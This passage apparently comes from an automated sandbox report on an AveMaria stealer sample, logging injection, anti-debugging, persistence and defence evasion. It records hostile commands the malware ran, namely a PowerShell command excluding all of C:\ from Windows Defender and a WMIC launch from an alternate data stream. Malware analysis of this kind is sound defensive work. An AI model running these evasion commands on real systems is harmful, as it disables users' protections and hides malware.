            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe TID: 6100Thread sleep count: 59 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5708Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\ProgramData\windowupdate.exe TID: 5060Thread sleep count: 107 > 30Jump to behavior
            Source: C:\ProgramData\windowupdate.exe TID: 5060Thread sleep time: -85600s >= -30000sJump to behavior
            Source: C:\ProgramData\windowupdate.exe TID: 4884Thread sleep count: 59 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep time: -14757395258967632s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2756Thread sleep count: 805 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2756Thread sleep time: -9660000s >= -30000sJump to behavior
            Source: C:\ProgramData\windowupdate.exeLast function: Thread delayed
            Source: C:\ProgramData\windowupdate.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5448Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1736Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5712
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1074
            Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 805Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeAPI coverage: 3.1 %
            Source: C:\ProgramData\windowupdate.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_0096B663 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,0_2_0096B663
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009ADAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_009ADAE0
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D9DAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,3_2_00D9DAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: powershell.exe, 00000001.00000003.375917316.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.416120857.0000000005033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000000.255527605.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp, windowupdate.exe, 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp, windowupdate.exe, 00000003.00000000.281195530.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@,
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.drBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.drBinary or memory string: I.?AVCRegistryVirtualMachine@ATL@@,
            Source: powershell.exe, 00000001.00000003.375917316.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.416120857.0000000005033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00992720 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992720
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_0096B663 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C0_2_0096B663
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009D20D0 VirtualQuery,GetProcAddress,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,0_2_009D20D0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00956AF9 mov esi, dword ptr fs:[00000030h]0_2_00956AF9
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D46AF9 mov esi, dword ptr fs:[00000030h]3_2_00D46AF9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032B001A mov eax, dword ptr fs:[00000030h]14_2_032B001A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00958C70 SetUnhandledExceptionFilter,0_2_00958C70
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009575F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009575F0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00992720 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992720
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00958A40 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00958A40
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D48C70 SetUnhandledExceptionFilter,3_2_00D48C70
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D475F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00D475F0
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D82720 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D82720
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D48A40 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D48A40

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\ProgramData\windowupdate.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 32B0000Jump to behavior
            Source: C:\ProgramData\windowupdate.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3360000Jump to behavior
            Allocates memory in foreign processes
            Source: C:\ProgramData\windowupdate.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 32B0000 protect: page execute and read and writeJump to behavior
            Source: C:\ProgramData\windowupdate.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3360000 protect: page read and writeJump to behavior
            Creates a thread in another existing process (thread injection)
            Source: C:\ProgramData\windowupdate.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 32B010EJump to behavior
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'Jump to behavior
            Source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
            Source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\ProgramData\windowupdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00959370 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00959370

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Increases the number of concurrent connection per server for Internet Explorer
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
